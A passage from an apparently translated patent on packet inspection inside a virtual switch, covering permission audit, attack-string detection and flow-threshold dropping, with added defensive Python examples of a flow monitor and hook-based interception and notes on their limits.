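# given as header prefix / body fragment / trailer suffix (None = not checked)
# plus the bytes allowed for that format inside the preset time window.
FLOW_FEATURES = [
    {"header": b"\x16\x03", "body": None, "trailer": None,
     "window_s": 1.0, "threshold_bytes": 4000},
]


class FlowMonitor:
    """Matching unit + second judging unit of the flow intrusion embodiment."""

    def __init__(self, features):
        self.features = features
        self.history = [deque() for _ in features]   # (ts, size) per format

    @staticmethod
    def matches(pkt, feat):
        return ((feat["header"] is None or pkt.header.startswith(feat["header"]))
                and (feat["body"] is None or feat["body"] in pkt.body)
                and (feat["trailer"] is None or pkt.trailer.endswith(feat["trailer"])))

    def exceeds(self, pkt):
        """Record the packet against each format it matches and report whether
        the matched traffic within the preset time now exceeds the threshold."""
        over = False
        for feat, hist in zip(self.features, self.history):
            if not self.matches(pkt, feat):
                continue
            hist.append((pkt.ts, pkt.size()))
            while hist and pkt.ts - hist[0][0] > feat["window_s"]:
                hist.popleft()                # expire packets outside the window
            if sum(s for _, s in hist) > feat["threshold_bytes"]:
                over = True
        return over


def process(pkt, monitor, drop_on_attack=False):
    """Processing module: returns ('forward' | 'filtered' | 'drop', packet)."""
    sig = detect_attack(pkt)
    if sig is not None:
        if drop_on_attack:
            return "drop", pkt
        pkt, result = filter_attack(pkt, sig), "filtered"
    else:
        result = "forward"
    if monitor.exceeds(pkt):
        return "drop", pkt
    return result, pkt
```

Two points a practitioner would check before relying on this: the attack-string table only covers protocols it names, so a packet on an unlisted protocol is forwarded uninspected, and the filter branch removes only the matched descriptor, so a request built from several fragments may still be hostile; the patent leaves the choice between discarding and filtering to the deployment.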
Fig. 11 is a schematic structural diagram of a virtual-switch-based virtual platform security protection system provided by an embodiment of the present invention. As shown in Fig. 11, the system comprises a first device 1 and a second device 2 located on the virtual platform, and a virtual switch 3 deployed in a physical machine, wherein the first device 1 and the second device 2 each comprise a physical machine 4 on the virtual platform or a virtual machine 5 deployed in a physical machine, and the virtual switch 3 comprises the virtual-switch-based virtual platform security protection apparatus 6. The embodiment of Fig. 11 is illustrated with the first device 1 being a first virtual machine and the second device 2 being a second virtual machine, the two communicating through the virtual switch 3.
For the functions and processing flow of the modules of the virtual-switch-based virtual platform security protection system provided by this embodiment, reference may be made to the method embodiments described above; the implementation principle is similar and is not repeated here.
The virtual-switch-based virtual platform security protection system provided by this embodiment intercepts, through the first interface of the virtual switch, the packets sent by the first device to the second device on the communication link of the virtual switch, uses the feature information in the data feature library corresponding to the network security policy to detect whether a packet is safe, and if so sends it to the second device through the second interface of the virtual switch. This avoids exporting the communication traffic of the virtual switch to an external system for security detection, improves the processing efficiency of security detection and reduces the latency of communication.
Embodiments of the present invention provide the following technical solutions:
A1. A virtual-switch-based virtual platform security protection method, characterized in that the method comprises:
receiving a packet sent by a first interface in a virtual switch, the first interface being configured to intercept, on a communication link in the virtual switch, packets sent by a first device to a second device;
using a data feature library to detect whether the packet meets a preset network security policy, the data feature library comprising feature information corresponding to the network security policy;
if it is judged that the packet meets the network security policy, sending the packet that has passed security detection to the second device through a second interface in the virtual switch.
A2. The method according to A1, characterized in that, before receiving the packet sent by the first interface in the virtual switch, the method further comprises:
using a hook subroutine to set, on the communication link, a first registration point for intercepting the packet, and encapsulating the first registration point to establish the first interface;
and/or,
using a hook subroutine to set, on the communication link, a second registration point for forwarding the packet, and encapsulating the second registration point to establish the second interface.
A3. The method according to A1 or A2, characterized in that it further comprises:
if it is judged that the packet does not meet the network security policy, performing security protection processing on the packet according to the network threat type in the network security policy.
A4. The method according to A3, characterized in that the network security policy comprises:
at least one of network permission audit, network attack detection and flow intrusion.
A5. The method according to A4, characterized in that the network security policy is network permission audit, and the feature information corresponding to the network security policy comprises IP address information and network access permission information corresponding to the IP address information;
using the data feature library to detect whether the packet meets the preset network security policy comprises:
obtaining the network access permission information corresponding to the source IP of the packet, and auditing the legality of the destination IP according to the network access permission information;
performing security protection processing on the packet according to the network threat type in the network security policy comprises:
if it is judged that the destination IP is illegal, rewriting the destination IP of the packet to a lawful IP according to the network access permission information, and sending the modified packet to the second interface.
A6. The method according to A4, characterized in that the network security policy is network attack detection, and the feature information corresponding to the network security policy comprises the key field corresponding to the communication protocol of the packet and descriptive information of attack strings;
using the data feature library to detect whether the packet meets the preset network security policy comprises:
determining the communication protocol used by the packet;
obtaining the data in the key field corresponding to the communication protocol, and judging whether the data in the key field contains the descriptive information of an attack string;
performing security protection processing on the packet according to the network threat type in the network security policy comprises:
if it is judged that the data in the key field contains the descriptive information of an attack string, discarding the packet; or, filtering the packet to obtain a packet that meets the network security policy and sending it to the second interface.
A7. The method according to A4, characterized in that the network security policy is flow intrusion, and the feature information corresponding to the network security policy comprises format information of the packet and a flow threshold within a preset time corresponding to the format information, wherein the format information comprises at least one of the header information, the format of the intermediate (payload) portion and the format of the trailer portion;
using the data feature library to detect whether the packet meets the preset network security policy comprises:
matching the header information, the intermediate-portion format and the trailer format of the packet against the format information in the feature information;
judging whether the flow of successfully matched packets within the preset time exceeds the preset flow threshold;
performing security protection processing on the packet according to the network threat type in the network security policy comprises:
if it is judged that the flow of successfully matched packets within the preset time exceeds the flow threshold, discarding the packet.
B8. A virtual-switch-based virtual platform security protection apparatus, characterized in that the apparatus comprises:
a receiver module, configured to receive a packet sent by a first interface in a virtual switch, the first interface being configured to intercept, on a communication link in the virtual switch, packets sent by a first device to a second device;
a detection module, configured to use a data feature library to detect whether the packet meets a preset network security policy, the data feature library comprising feature information corresponding to the network security policy;
a sending module, configured to send the packet that has passed security detection to the second device through a second interface in the virtual switch if it is judged that the packet meets the network security policy.
B9. The apparatus according to B8, characterized in that it further comprises:
a setting module, configured to use a hook subroutine to set, on the communication link, a first registration point for intercepting the packet, and to encapsulate the first registration point to establish the first interface;
and/or,
to use a hook subroutine to set, on the communication link, a second registration point for forwarding the packet, and to encapsulate the second registration point to establish the second interface.
B10. The apparatus according to B8 or B9, characterized in that it further comprises:
a processing module, configured to perform security protection processing on the packet according to the network threat type in the network security policy if it is judged that the packet does not meet the network security policy.
B11. The apparatus according to B10, characterized in that the network security policy comprises:
at least one of network permission audit, network attack detection and flow intrusion.
B12. The apparatus according to B11, characterized in that the network security policy is network permission audit, and the feature information corresponding to the network security policy comprises IP address information and network access permission information corresponding to the IP address information;
the detection module comprises:
an acquiring unit, configured to obtain the network access permission information corresponding to the source IP of the packet;
an auditing unit, configured to audit the legality of the destination IP according to the network access permission information;
the processing module is specifically configured to:
if it is judged that the destination IP is illegal, rewrite the destination IP of the packet to a lawful IP according to the network access permission information, and send the modified packet to the second interface.
B13. The apparatus according to B11, characterized in that the network security policy is network attack detection, and the feature information corresponding to the network security policy comprises the key field corresponding to the communication protocol of the packet and descriptive information of attack strings;
the detection module comprises:
a determining unit, configured to determine the communication protocol used by the packet;
a first judging unit, configured to obtain the data in the key field corresponding to the communication protocol and to judge whether the data in the key field contains the descriptive information of an attack string;
the processing module is specifically configured to:
if it is judged that the data in the key field contains the descriptive information of an attack string, discard the packet; or, filter the packet to obtain a packet that meets the network security policy and send it to the second interface.
B14. The apparatus according to B11, characterized in that the network security policy is flow intrusion, and the feature information corresponding to the network security policy comprises format information of the packet and a flow threshold within a preset time corresponding to the format information, wherein the format information comprises at least one of the header information, the format of the intermediate (payload) portion and the format of the trailer portion;
the detection module comprises:
a matching unit, configured to match the header information, the intermediate-portion format and the trailer format of the packet against the format information in the feature information;
a second judging unit, configured to judge whether the flow of successfully matched packets within the preset time exceeds the preset flow threshold;
the processing module is specifically configured to:
if it is judged that the flow of successfully matched packets within the preset time exceeds the flow threshold, discard the packet.
C15. A virtual-switch-based virtual platform security protection system, characterized in that the system comprises a first device and a second device located on a virtual platform, and a virtual switch, wherein the first device and the second device each comprise a physical machine on the virtual platform or a virtual machine deployed in a physical machine, and the virtual switch comprises the virtual-switch-based virtual platform security protection apparatus according to any one of B8 to B14.
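The hook-based interception of A2/B9 and the network permission audit of A5/B12, written out as an added example (not the patent's own code). The link model (two named registration points on which hook subroutines are called in order), the permission table keyed by source IP, and the choice of a single quarantine address as the "lawful IP" substituted for an illegal destination are assumptions made for illustration; the patent does not fix how the lawful IP is chosen.

```python
"""Hook-based interception on the communication link (A2/B9) with the network
permission audit policy (A5/B12), as an added example; the link model, the
permission table and the choice of lawful IP are assumptions for illustration."""
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Packet:
    src_ip: str
    dst_ip: str
    payload: bytes = b""


class CommunicationLink:
    """Minimal model of the link between two ports of a virtual switch. Hook
    subroutines registered at the first point see every packet before it is
    forwarded; hooks at the second point see what is actually sent on."""

    def __init__(self):
        self.points = {"first": [], "second": []}
        self.delivered = []                 # packets that reached the second device

    def register(self, point, hook):
        self.points[point].append(hook)

    def transmit(self, pkt):
        for hook in self.points["first"]:   # first registration point: interception
            pkt = hook(pkt)
            if pkt is None:                 # a hook discarded the packet
                return None
        for hook in self.points["second"]:  # second registration point: forwarding
            pkt = hook(pkt)
        self.delivered.append(pkt)
        return pkt


class ProtectionDevice:
    """Receiver module, detection module (acquiring + auditing unit), processing
    module and sending module for the network permission audit policy."""

    def __init__(self, permissions, lawful_ip):
        self.permissions = permissions      # data feature library: src IP -> permitted dst IPs
        self.lawful_ip = lawful_ip          # assumed: one quarantine address used as the lawful IP
        self.audit_log = []

    def on_first_interface(self, pkt):
        """Called through the first interface for every intercepted packet."""
        # acquiring unit: an unknown source IP has no permissions (deny by default)
        allowed = self.permissions.get(pkt.src_ip, frozenset())
        if pkt.dst_ip in allowed:           # auditing unit: destination is legal
            self.audit_log.append(("legal", pkt.src_ip, pkt.dst_ip))
            return pkt                      # sending module: on to the second interface
        # processing module: destination is illegal for this source, so rewrite
        # it to the lawful IP and forward the modified packet
        self.audit_log.append(("rewritten", pkt.src_ip, pkt.dst_ip))
        return replace(pkt, dst_ip=self.lawful_ip)


def build_link(permissions, lawful_ip):
    """Wire a protection device into a link: the first interface encapsulates
    the first registration point, the second interface the forwarding point."""
    link = CommunicationLink()
    device = ProtectionDevice(permissions, lawful_ip)
    link.register("first", device.on_first_interface)
    link.register("second", lambda p: p)    # second interface: plain forwarding
    return link, device
```

The audit keys on the source IP carried in the packet header. A guest that spoofs its source address can therefore claim another machine's permissions, so a deployment of this scheme should have the hook bind the source address to the virtual port the packet arrived on rather than trusting the header alone; the patent describes the lookup, not that binding.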
Those of ordinary skill in the art will appreciate that all or part of the steps of the above method embodiments may be implemented by hardware related to program instructions; the program may be stored in a computer-readable storage medium and, when executed, performs the steps of the above method embodiments; the storage medium includes various media capable of storing program code, such as ROM, RAM, a magnetic disk or an optical disc.
Finally, it should be noted that the above embodiments are merely intended to illustrate the technical solutions of the present invention and not to limit them. Although the present invention has been described in detail with reference to the foregoing embodiments, those of ordinary skill in the art should understand that the technical solutions described in the foregoing embodiments may still be modified, or some or all of their technical features may be equivalently replaced, and that such modifications or replacements do not cause the essence of the corresponding technical solutions to depart from the scope of the technical solutions of the embodiments of the present invention.